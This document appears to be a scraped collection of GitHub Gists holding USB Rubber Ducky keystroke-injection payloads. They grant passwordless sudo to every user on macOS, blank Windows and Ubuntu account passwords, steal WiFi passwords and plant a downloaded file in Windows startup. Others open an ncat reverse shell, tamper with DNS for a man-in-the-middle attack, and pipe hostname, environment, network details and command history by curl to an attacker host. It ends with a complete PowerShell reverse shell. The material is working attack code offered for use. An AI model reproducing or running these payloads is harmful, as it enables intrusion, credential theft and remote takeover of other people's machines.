This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM MacOS AllSudo | |
| REM Enables Sudo access for all users without a password | |
| REM First boot the machine into single user mode - https://support.apple.com/en-us/HT201573 | |
| REM By Jesse Wallace (@c0deous) | |
| REM https://c0deo.us/ | |
| DELAY 1000 | |
| STRING mount -uw / && chmod 755 /etc/sudoers && echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && chmod 440 /etc/sudoers && shutdown -h now | |
| ENTER | |
| REM Now would be a great time to install a backdoor. Ez root ;3 | |
| REM TODO Use visudo for edits (unconfirmed if working) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DELAY 5000 | |
| GUI r | |
| DELAY 200 | |
| STRING notepad.exe | |
| DELAY 200 | |
| ENTER | |
| DELAY 200 | |
| STRING "echo off | |
| DELAY 200 | |
| ENTER |
JonnyBanana
/ Windows Password Resetter
Created
April 17, 2018 04:55
https://github.com/TonyTransistor/DuckyPWN/blob/master/WindowsPayload.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM This payload will remove the current users password on windows and give you keys to the kingdom | |
| GUI r | |
| STRING cmd | |
| ENTER | |
| DELAY 500 | |
| REM It is important that you change to the target username below, will continue to work on copy/pasting from cmd prompt | |
| STRING net user USERNAME HERE "" |
JonnyBanana
/ Ubuntu Password Resetter
Created
April 17, 2018 04:54
https://github.com/TonyTransistor/DuckyPWN/blob/master/UbuntuPayload.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Reseting Pasword on Ubuntu | |
| CTRL ALT DELETE | |
| STRING reboot | |
| DELAY 10000 | |
| SHIFT | |
| ENTER | |
| ENTER | |
| STRING mount -o rw,remount / | |
| STRING passwd root |
JonnyBanana
/ WiFi Pass Exfiltration
Created
April 17, 2018 04:52
https://github.com/tylertechnz/duckyscripts/blob/master/WiFi%20Password%20Exfiltration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Password Stealing script by TylerTechNZ | |
| REM | |
| REM --> Create Obfuscated CMD | |
| DELAY 2000 | |
| WINDOWS r | |
| DELAY 200 | |
| STRING cmd | |
| ENTER | |
| DELAY 200 | |
| STRING MODE 20,1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Target OS: Windows 7, Not yet tested on 10 or 8 | |
| REM Change the 'DIRECTFILEURL' to a direct download link to your file. I recommend using Google Drive and going to this website to make REM them a direct download link | |
| REM :https://sites.google.com/site/gdocs2direct/ | |
| REM This works by downloading the file via Internet Explorer then confirming the download. After that it creates a shortcut for the file REM you uploaded and puts it in the shell:startup for the computer. | |
| REM Also remember to replace 'FILENAMEHERE' to the name of your file so it can create the shortcut. | |
| REM You may change the delays depending on how fast the target computer is. | |
| REM Made By: TheUnkown | |
| GUI r | |
| DELAY 1000 |
JonnyBanana
/ ncat revershe shell
Created
April 17, 2018 03:35
https://github.com/duckinator/rubber-ducky-scripts/blob/master/scripts/ncat-reverse-shell.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Get a reverse shell usign ncat. | |
| REM Run `nc -l 9999` to wait for the reverse shell. | |
| REM Make sure to update the hostname before using it. | |
| DELAY 1000 | |
| ALT F2 | |
| DELAY 100 | |
| STRING sh -c "nc -e /bin/bash eternal-pickle 9999" | |
| REM Delay to make it work in KDE. Not sure why that's necessary. | |
| DELAY 100 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Set up a DNS-based MITM attack. | |
| DELAY 1000 | |
| ALT F2 | |
| DELAY 100 | |
| STRING sh -c 'function mitm() { for ((i=0;i<10;i++)); do nmcli connection modify "$1" -ipv4.dns 0; done; nmcli connection modify "$1" +ipv4.dns 8.8.8.8; }; for x in $(nmcli -t connection show --active | cut -d: -f1); do mitm "$x"; done;' | |
| ENTER |
JonnyBanana
/ exfiltrate some infos...
Created
April 17, 2018 03:29
https://github.com/duckinator/rubber-ducky-scripts/blob/master/scripts/exfiltrate.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM Exfiltrate various useful information. | |
| REM To capture, run `nc -l 9999`. | |
| REM Make sure to update the hostname before using it. | |
| DELAY 1000 | |
| ALT F2 | |
| DELAY 100 | |
| STRING sh -c "{ printf 'Hostname: '; hostname; echo; printf 'uname: '; uname -a; echo; echo Env:; env; echo; echo Network:; nmcli; echo; /sbin/ifconfig -a; echo '/etc/hosts:'; cat /etc/hosts; echo; echo Mounts:; mount; echo; echo 'Running services:'; netstat -tunlpe; echo; echo 'Installed packages:'; dpkg -l || dnf list --installed || pacman -Ql; echo; echo 'Command history:'; history; echo; } | curl -F data='<-' http://eternal-pickle:9999" | |
| ENTER |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #A simple and small reverse shell. Options and help removed to save space. | |
| #Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well. | |
| $client = New-Object System.Net.Sockets.TCPClient("192.168.1.15",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | |
| #$sm=(New-Object Net.Sockets.TCPClient("192.168.1.15",4444)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} |